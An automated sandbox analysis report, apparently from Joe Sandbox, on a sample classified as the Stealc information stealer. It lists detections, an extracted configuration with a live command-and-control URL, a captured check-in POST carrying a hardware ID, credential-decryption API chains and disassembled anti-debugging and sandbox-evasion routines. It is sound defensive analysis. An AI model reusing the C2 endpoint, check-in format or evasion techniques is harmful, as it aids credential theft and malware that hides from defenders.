Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540731
MD5: 7cec6eefc34f3702d47fa5a28cbbb929
SHA1: dfe6aa0c35d17240cc857447d90614cec2d05b1a
SHA256: a6f91d78572a12eb6f938220ee73f01ee43ef6fdfaaedf8439c0be80553dd841
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7CEC6EEFC34F3702D47FA5A28CBBB929)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1400 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1400 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.de0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-24T04:01:20.917646+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.de0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/rsonation | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00DEC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00DE9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00DE7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00DE9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00DF8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DF38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DF4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DEE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DF4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DEED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DE16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEF68A FindFirstFileA,0_2_00DEF68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DF3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEDE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49723 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHC
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 46 35 37 36 43 42 45 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------DGHCBAAEHCFIDGDHJEHC
Content-Disposition: form-data; name="hwid"

CCF576CBE6684217651120
------DGHCBAAEHCFIDGDHJEHC
Content-Disposition: form-data; name="build"

doma
------DGHCBAAEHCFIDGDHJEHC--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00DE4880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers, Content-Length 211 and multipart body with the "hwid" and "build" fields as the global traffic entry above)
Source: file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/KW
Source: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpIh
Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpoW
Source: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/rsonation

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 0_2_011C5904
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B315F 0_2_011B315F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010E599E 0_2_010E599E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BB841 0_2_011BB841
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C28F2 0_2_010C28F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BD3B4 0_2_011BD3B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A43DD 0_2_010A43DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B822D 0_2_011B822D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011AFAB6 0_2_011AFAB6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BEDDE 0_2_011BEDDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D15D6 0_2_010D15D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C45C1 0_2_011C45C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C7402 0_2_011C7402
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01241F39 0_2_01241F39
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B16D8 0_2_011B16D8
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00DE45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: fzxkvimr ZLIB complexity 0.9951563407902382
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00DF8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00DF3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KE52B6CI.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1918464 > 1048576
Source: file.exe | Static PE information: Raw size of fzxkvimr is bigger than: 0x100000 < 0x1ae400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.de0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: fzxkvimr
Source: file.exe | Static PE information: section name: ubuokytu
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129A122 push ebx; mov dword ptr [esp], ecx 0_2_0129A06E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push eax; mov dword ptr [esp], esi 0_2_011C5908
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 7A90DFE0h; mov dword ptr [esp], edx 0_2_011C5928
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 33C0B188h; mov dword ptr [esp], esi 0_2_011C597C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ecx; mov dword ptr [esp], ebp 0_2_011C598B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ecx; mov dword ptr [esp], 4B7EBF00h 0_2_011C59A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ebp; mov dword ptr [esp], ebx 0_2_011C59E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ecx; mov dword ptr [esp], esi 0_2_011C5B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push eax; mov dword ptr [esp], 1D3F3CF6h 0_2_011C5C11
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edi; mov dword ptr [esp], esi 0_2_011C5C7A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edx; mov dword ptr [esp], ebp 0_2_011C5C9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 056E4401h; mov dword ptr [esp], ecx 0_2_011C5CE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edi; mov dword ptr [esp], eax 0_2_011C5D44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edx; mov dword ptr [esp], ecx 0_2_011C5D54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 0A8F6FE2h; mov dword ptr [esp], eax 0_2_011C5D82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ebx; mov dword ptr [esp], 7BFAAC3Eh 0_2_011C5D9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ebp; mov dword ptr [esp], esi 0_2_011C5E5A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edx; mov dword ptr [esp], ebp 0_2_011C5F0C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 3C57C4FBh; mov dword ptr [esp], esp 0_2_011C5F39
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 3BCBB000h; mov dword ptr [esp], edi 0_2_011C5FE4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ecx; mov dword ptr [esp], eax 0_2_011C5FE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 5D97B30Dh; mov dword ptr [esp], eax 0_2_011C6022
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push eax; mov dword ptr [esp], ebp 0_2_011C6064
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push eax; mov dword ptr [esp], ebx 0_2_011C607D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 2285F2EEh; mov dword ptr [esp], edx 0_2_011C60E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 329F207Dh; mov dword ptr [esp], edi 0_2_011C6151
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push ecx; mov dword ptr [esp], edi 0_2_011C618C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push 6DADD827h; mov dword ptr [esp], ebx 0_2_011C61D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edi; mov dword ptr [esp], ebx 0_2_011C61EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edx; mov dword ptr [esp], ebx 0_2_011C61F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C5904 push edi; mov dword ptr [esp], 04F9EAC6h 0_2_011C6216
Source: file.exe | Static PE information: section name: fzxkvimr entropy: 7.9537968539439525

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13697
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10421CB second address: 1041A97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04D4C79EACh 0x00000008 jng 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F04D4C79EC0h 0x00000017 push ecx 0x00000018 jmp 00007F04D4C79EB8h 0x0000001d pop ecx 0x0000001e nop 0x0000001f pushad 0x00000020 pushad 0x00000021 mov ebx, dword ptr [ebp+122D3917h] 0x00000027 jmp 00007F04D4C79EB6h 0x0000002c popad 0x0000002d mov dword ptr [ebp+122D1AD7h], ecx 0x00000033 popad 0x00000034 push dword ptr [ebp+122D11D9h] 0x0000003a jmp 00007F04D4C79EB9h 0x0000003f call dword ptr [ebp+122D27AFh] 0x00000045 pushad 0x00000046 jo 00007F04D4C79EACh 0x0000004c mov dword ptr [ebp+122D17D9h], edx 0x00000052 xor eax, eax 0x00000054 mov dword ptr [ebp+122D17D9h], edi 0x0000005a mov edx, dword ptr [esp+28h] 0x0000005e cld 0x0000005f jmp 00007F04D4C79EB5h 0x00000064 mov dword ptr [ebp+122D385Bh], eax 0x0000006a stc 0x0000006b mov esi, 0000003Ch 0x00000070 pushad 0x00000071 mov ax, 116Bh 0x00000075 popad 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a cld 0x0000007b lodsw 0x0000007d jmp 00007F04D4C79EAAh 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 jnl 00007F04D4C79EACh 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 mov dword ptr [ebp+122D17D9h], ebx 0x00000096 nop 0x00000097 push eax 0x00000098 push edx 0x00000099 jmp 00007F04D4C79EB1h 0x0000009e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1041A97 second address: 1041AB9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C82A58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1041AB9 second address: 1041ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1041ABD second address: 1041AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CDE33 second address: 11CDE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB1h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F04D4C79EB7h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CDE67 second address: 11CDE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F04D4C82A55h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CDE88 second address: 11CDE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CDE8C second address: 11CDE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CDE98 second address: 11CDEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F04D4C79EB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CE066 second address: 11CE06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CE82C second address: 11CE830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11D0931 second address: 11D0949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A54h 0x00000009 rdtsc
